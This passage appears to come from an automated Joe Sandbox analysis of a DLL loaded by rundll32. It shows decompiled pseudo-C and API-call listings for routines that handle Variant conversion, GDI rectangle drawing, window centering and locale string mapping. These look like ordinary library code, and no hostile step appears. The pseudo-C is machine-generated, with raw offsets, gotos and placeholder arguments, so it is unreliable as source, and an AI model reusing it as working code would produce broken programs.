                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 1:
                                                                        										__ecx =  *(__ebp - 0x34);
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 2:
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 3:
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                        										goto L79;
                                                                        									case 4:
                                                                        										__ecx =  *(__ebp - 0x34);
                                                                        										__eax =  *(__ebp + 0x14);
                                                                        										 *__eax =  *(__ebp - 0x34);
                                                                        										__ecx =  *(__ebp - 0x30);
                                                                        										 *(__eax + 4) =  *(__ebp - 0x30);
                                                                        										goto L79;
                                                                        									case 5:
                                                                        										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
                                                                        										_push( *(__ebp - 0x34));
                                                                        										__imp__#6();
                                                                        										goto L79;
                                                                        									case 6:
                                                                        										__ecx =  *(__ebp + 0x14);
                                                                        										__eax = 0;
                                                                        										__eflags =  *(__ebp - 0x34) - __bx;
                                                                        										__eax = 0 | __eflags != 0x00000000;
                                                                        										 *( *(__ebp + 0x14)) = __eflags != 0;
                                                                        										goto L79;
                                                                        									case 7:
                                                                        										__edi =  *(__ebp + 0x14);
                                                                        										__esi = __ebp - 0x3c;
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										goto L79;
                                                                        									case 8:
                                                                        										goto L79;
                                                                        									case 9:
                                                                        										_t161 =  *(_t247 + 0x14);
                                                                        										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
                                                                        										goto L79;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L79:
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
                                                                        				return _t161;
                                                                        			}







































                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10039B2B
                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                        • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                        • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                        • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                        • String ID:
                                                                        • API String ID: 344392101-0
                                                                        • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                        • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10033FCE(intOrPtr* __ecx, void* __eflags) {
                                                                        				void* __esi;
                                                                        				void* _t132;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t226;
                                                                        				void* _t229;
                                                                        
                                                                        				E10011BF0(0x1003b231, _t229);
                                                                        				_t226 = __ecx;
                                                                        				 *((intOrPtr*)(_t229 - 0x30)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
                                                                        				 *((intOrPtr*)(_t229 - 0x20)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 2;
                                                                        				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
                                                                        				CopyRect(_t229 - 0x44,  *(_t229 + 8));
                                                                        				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
                                                                        				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
                                                                        				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
                                                                        				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                                                        				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                        				_t235 =  *((intOrPtr*)(_t229 + 0x20));
                                                                        				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
                                                                        					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
                                                                        					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
                                                                        				}
                                                                        				 *((intOrPtr*)(_t229 - 0x18)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
                                                                        				 *((intOrPtr*)(_t229 - 0x10)) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
                                                                        				 *(_t229 - 4) = 4;
                                                                        				if( *(_t229 + 0x14) != 0) {
                                                                        					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
                                                                        					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
                                                                        					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
                                                                        					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
                                                                        					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
                                                                        					E1001045D(_t229 - 0x24, _t229 - 0x44);
                                                                        					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
                                                                        						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
                                                                        						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
                                                                        					}
                                                                        				}
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
                                                                        					E10028E1A(_t226, _t229 - 0x1c);
                                                                        					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                        					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
                                                                        					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                        					E10029439(_t226,  *(_t229 + 0x14));
                                                                        				}
                                                                        				_t132 = _t229 - 0x14;
                                                                        				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
                                                                        					_t132 = _t229 - 0x34;
                                                                        				}
                                                                        				E10028E1A(_t226, _t132);
                                                                        				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                        				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
                                                                        				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                        				if( *(_t229 + 0x14) != 0) {
                                                                        					E10029439(_t226,  *(_t229 + 0x14));
                                                                        				}
                                                                        				E10028E1A(_t226, 0);
                                                                        				 *(_t229 - 4) = 3;
                                                                        				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x14);
                                                                        				 *(_t229 - 4) = 2;
                                                                        				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x1c);
                                                                        				 *(_t229 - 4) = 1;
                                                                        				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x24);
                                                                        				 *(_t229 - 4) = 0;
                                                                        				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
                                                                        				E100293B4(_t229 - 0x2c);
                                                                        				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
                                                                        				_t145 = E100293B4(_t229 - 0x34);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
                                                                        				return _t145;
                                                                        			}









                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10033FD3
                                                                          • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                        • CopyRect.USER32 ref: 10034012
                                                                        • InflateRect.USER32(?,?,?), ref: 10034028
                                                                        • IntersectRect.USER32 ref: 10034036
                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                          • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                        • CopyRect.USER32 ref: 100340CC
                                                                        • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                        • IntersectRect.USER32 ref: 100340F0
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                        • String ID:
                                                                        • API String ID: 897514543-0
                                                                        • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                        • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				signed int _v5;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagRECT _v28;
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				struct tagRECT _v80;
                                                                        				char _v100;
                                                                        				intOrPtr _t55;
                                                                        				struct HWND__* _t56;
                                                                        				intOrPtr _t78;
                                                                        				intOrPtr _t90;
                                                                        				signed int _t99;
                                                                        				struct HWND__* _t100;
                                                                        				struct HWND__* _t102;
                                                                        				void* _t104;
                                                                        				long _t110;
                                                                        				void* _t113;
                                                                        				struct HWND__* _t115;
                                                                        				void* _t117;
                                                                        				intOrPtr _t119;
                                                                        				intOrPtr _t123;
                                                                        
                                                                        				_t113 = __edx;
                                                                        				_t119 = __ecx;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = E100202AB(__ecx);
                                                                        				_t55 = _a4;
                                                                        				if(_t55 == 0) {
                                                                        					if((_v5 & 0x00000040) == 0) {
                                                                        						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                                                        					} else {
                                                                        						_t56 = GetParent( *(__ecx + 0x1c));
                                                                        					}
                                                                        					_t115 = _t56;
                                                                        					if(_t115 != 0) {
                                                                        						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                                                        						if(_t100 != 0) {
                                                                        							_t115 = _t100;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t115 =  *(_t55 + 0x1c);
                                                                        				}
                                                                        				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                                                        				if((_v5 & 0x00000040) != 0) {
                                                                        					_t102 = GetParent( *(_t119 + 0x1c));
                                                                        					GetClientRect(_t102,  &_v28);
                                                                        					GetClientRect(_t115,  &_v60);
                                                                        					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                                                        				} else {
                                                                        					if(_t115 != 0) {
                                                                        						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                                                                        						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                                                        							_t115 = 0;
                                                                        						}
                                                                        					}
                                                                        					_v100 = 0x28;
                                                                        					if(_t115 != 0) {
                                                                        						GetWindowRect(_t115,  &_v60);
                                                                        						E10007B50(E10007AE5(_t115, 2),  &_v100);
                                                                        						CopyRect( &_v28,  &_v80);
                                                                        					} else {
                                                                        						_t90 = E10006C53();
                                                                        						if(_t90 != 0) {
                                                                        							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                                                        						}
                                                                        						E10007B50(E10007AE5(_t90, 1),  &_v100);
                                                                        						CopyRect( &_v60,  &_v80);
                                                                        						CopyRect( &_v28,  &_v80);
                                                                        					}
                                                                        				}
                                                                        				_t117 = _v44.right - _v44.left;
                                                                        				asm("cdq");
                                                                        				_t104 = _v44.bottom - _v44.top;
                                                                        				asm("cdq");
                                                                        				_t114 = _v60.bottom;
                                                                        				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                                                        				asm("cdq");
                                                                        				asm("cdq");
                                                                        				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                                                        				if(_t110 >= _v28.left) {
                                                                        					_t78 = _v28.right;
                                                                        					if(_t117 + _t110 > _t78) {
                                                                        						_t110 = _t78 - _v44.right + _v44.left;
                                                                        					}
                                                                        				} else {
                                                                        					_t110 = _v28.left;
                                                                        				}
                                                                        				if(_t123 >= _v28.top) {
                                                                        					if(_t104 + _t123 > _v28.bottom) {
                                                                        						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                                                        					}
                                                                        				} else {
                                                                        					_t123 = _v28.top;
                                                                        				}
                                                                        				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                                                        			}


                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                        • String ID:
                                                                        • API String ID: 808654186-0
                                                                        • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                        • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                        				signed int _t119;
                                                                        				intOrPtr _t120;
                                                                        				int _t122;
                                                                        				char* _t125;
                                                                        				int _t132;
                                                                        				signed int _t134;
                                                                        				int _t137;
                                                                        				int _t138;
                                                                        				short* _t160;
                                                                        				short* _t163;
                                                                        				int _t164;
                                                                        				signed int _t165;
                                                                        				long _t169;
                                                                        				signed int _t172;
                                                                        				int _t181;
                                                                        				char* _t183;
                                                                        				int _t184;
                                                                        				signed int _t186;
                                                                        				int _t187;
                                                                        				int _t190;
                                                                        				void* _t192;
                                                                        				short* _t193;
                                                                        				char* _t195;
                                                                        				char* _t196;
                                                                        				signed int _t199;
                                                                        
                                                                        				_t185 = __esi;
                                                                        				_push(0x38);
                                                                        				_push(0x10042708);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t199 =  *0x1004f73c; // 0x1
                                                                        				if(_t199 == 0) {
                                                                        					_t185 = 1;
                                                                        					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
                                                                        						_t169 = GetLastError();
                                                                        						__eflags = _t169 - 0x78;
                                                                        						if(_t169 == 0x78) {
                                                                        							 *0x1004f73c = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f73c = 1;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t192 + 0x14) <= 0) {
                                                                        					L11:
                                                                        					_t119 =  *0x1004f73c; // 0x1
                                                                        					if(_t119 == 2 || _t119 == 0) {
                                                                        						 *(_t192 - 0x28) = 0;
                                                                        						_t183 = 0;
                                                                        						 *(_t192 - 0x3c) = 0;
                                                                        						__eflags =  *(_t192 + 8);
                                                                        						if( *(_t192 + 8) == 0) {
                                                                        							_t138 =  *0x1004f724; // 0x0
                                                                        							 *(_t192 + 8) = _t138;
                                                                        						}
                                                                        						__eflags =  *(_t192 + 0x20);
                                                                        						if( *(_t192 + 0x20) == 0) {
                                                                        							_t137 =  *0x1004f734; // 0x0
                                                                        							 *(_t192 + 0x20) = _t137;
                                                                        						}
                                                                        						_t120 = E1001A444(0,  *(_t192 + 8));
                                                                        						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                        						__eflags = _t120 - 0xffffffff;
                                                                        						if(_t120 != 0xffffffff) {
                                                                        							__eflags = _t120 -  *(_t192 + 0x20);
                                                                        							if(__eflags == 0) {
                                                                        								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                        								L61:
                                                                        								__eflags =  *(_t192 - 0x28);
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t192 - 0x28));
                                                                        									E100107C8(0, _t183, _t186, __eflags);
                                                                        								}
                                                                        								_t122 = _t186;
                                                                        								goto L64;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_t175 = _t192 + 0x14;
                                                                        							_push(_t192 + 0x14);
                                                                        							_push( *(_t192 + 0x10));
                                                                        							_push(_t120);
                                                                        							_push( *(_t192 + 0x20));
                                                                        							_t125 = E1001A487(0, _t183, _t185, __eflags);
                                                                        							_t195 =  &(_t193[0xc]);
                                                                        							 *(_t192 - 0x28) = _t125;
                                                                        							__eflags = _t125;
                                                                        							if(_t125 == 0) {
                                                                        								goto L46;
                                                                        							}
                                                                        							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                        							 *(_t192 - 0x24) = _t187;
                                                                        							__eflags = _t187;
                                                                        							if(_t187 == 0) {
                                                                        								_t186 =  *(_t192 - 0x48);
                                                                        								L58:
                                                                        								__eflags =  *(_t192 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t183);
                                                                        									E100107C8(0, _t183, _t186, __eflags);
                                                                        								}
                                                                        								goto L61;
                                                                        							}
                                                                        							 *(_t192 - 4) = 0;
                                                                        							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                        							 *(_t192 - 0x18) = _t195;
                                                                        							_t183 = _t195;
                                                                        							 *(_t192 - 0x44) = _t183;
                                                                        							E10011C50(_t183, 0, _t187);
                                                                        							_t196 =  &(_t195[0xc]);
                                                                        							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        							__eflags = _t183;
                                                                        							if(_t183 != 0) {
                                                                        								L54:
                                                                        								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                        								 *(_t192 - 0x24) = _t132;
                                                                        								__eflags = _t132;
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t192 + 0x1c));
                                                                        									_push( *(_t192 + 0x18));
                                                                        									_push(_t192 - 0x24);
                                                                        									_push(_t183);
                                                                        									_push( *(_t192 + 0x20));
                                                                        									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                        									_t134 = E1001A487(0, _t183, _t187, __eflags);
                                                                        									asm("sbb esi, esi");
                                                                        									_t186 =  ~( ~_t134);
                                                                        									goto L58;
                                                                        								}
                                                                        								goto L55;
                                                                        							} else {
                                                                        								_t183 = E100107B6( *(_t192 - 0x24));
                                                                        								__eflags = _t183;
                                                                        								if(_t183 == 0) {
                                                                        									L55:
                                                                        									_t186 = 0;
                                                                        									goto L58;
                                                                        								}
                                                                        								E10011C50(_t183, 0,  *(_t192 - 0x24));
                                                                        								_t196 =  &(_t196[0xc]);
                                                                        								 *(_t192 - 0x3c) = 1;
                                                                        								goto L54;
                                                                        							}
                                                                        						} else {
                                                                        							goto L46;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t119 != 1) {
                                                                        							L46:
                                                                        							_t122 = 0;
                                                                        							L64:
                                                                        							return E1001254F(_t122);
                                                                        						}
                                                                        						_t184 = 0;
                                                                        						 *(_t192 - 0x2c) = 0;
                                                                        						 *(_t192 - 0x38) = 0;
                                                                        						 *(_t192 - 0x34) = 0;
                                                                        						if( *(_t192 + 0x20) == 0) {
                                                                        							_t164 =  *0x1004f734; // 0x0
                                                                        							 *(_t192 + 0x20) = _t164;
                                                                        						}
                                                                        						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                        						 *(_t192 - 0x30) = _t190;
                                                                        						if(_t190 == 0) {
                                                                        							goto L46;
                                                                        						} else {
                                                                        							 *(_t192 - 4) = 1;
                                                                        							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                        							 *(_t192 - 0x18) = _t193;
                                                                        							 *(_t192 - 0x1c) = _t193;
                                                                        							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        							if( *(_t192 - 0x1c) != 0) {
                                                                        								L21:
                                                                        								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                        									L36:
                                                                        									_t219 =  *(_t192 - 0x34);
                                                                        									if( *(_t192 - 0x34) != 0) {
                                                                        										_push( *(_t192 - 0x20));
                                                                        										E100107C8(0, _t184, _t190, _t219);
                                                                        									}
                                                                        									_t220 =  *(_t192 - 0x38);
                                                                        									if( *(_t192 - 0x38) != 0) {
                                                                        										_push( *(_t192 - 0x1c));
                                                                        										E100107C8(0, _t184, _t190, _t220);
                                                                        									}
                                                                        									_t122 = _t184;
                                                                        									goto L64;
                                                                        								}
                                                                        								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                        								 *(_t192 - 0x2c) = _t184;
                                                                        								if(_t184 == 0) {
                                                                        									goto L36;
                                                                        								}
                                                                        								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                        									 *(_t192 - 4) = 2;
                                                                        									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                        									 *(_t192 - 0x18) = _t193;
                                                                        									 *(_t192 - 0x20) = _t193;
                                                                        									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                        									__eflags =  *(_t192 - 0x20);
                                                                        									if( *(_t192 - 0x20) != 0) {
                                                                        										L31:
                                                                        										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                        										if(__eflags != 0) {
                                                                        											_push(0);
                                                                        											_push(0);
                                                                        											__eflags =  *(_t192 + 0x1c);
                                                                        											if(__eflags != 0) {
                                                                        												_push( *(_t192 + 0x1c));
                                                                        												_push( *(_t192 + 0x18));
                                                                        											} else {
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        											}
                                                                        											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                        										}
                                                                        										goto L36;
                                                                        									} else {
                                                                        										_t160 = E100107B6(_t184 + _t184);
                                                                        										 *(_t192 - 0x20) = _t160;
                                                                        										__eflags = _t160;
                                                                        										if(__eflags == 0) {
                                                                        											goto L36;
                                                                        										}
                                                                        										 *(_t192 - 0x34) = 1;
                                                                        										goto L31;
                                                                        									}
                                                                        								}
                                                                        								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                        									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                        								}
                                                                        								goto L36;
                                                                        							} else {
                                                                        								_t163 = E100107B6(_t190 + _t190);
                                                                        								_pop(_t172);
                                                                        								 *(_t192 - 0x1c) = _t163;
                                                                        								if(_t163 == 0) {
                                                                        									goto L46;
                                                                        								}
                                                                        								 *(_t192 - 0x38) = 1;
                                                                        								goto L21;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t181 =  *(_t192 + 0x14);
                                                                        				_t165 =  *(_t192 + 0x10);
                                                                        				while(1) {
                                                                        					_t172 = _t181 - 1;
                                                                        					if( *_t165 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t165 = _t165 + 1;
                                                                        					if(_t172 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					_t172 = _t172 | 0xffffffff;
                                                                        					break;
                                                                        				}
                                                                        				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                        				goto L11;
                                                                        			}





























                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                        • GetLastError.KERNEL32 ref: 100180BA
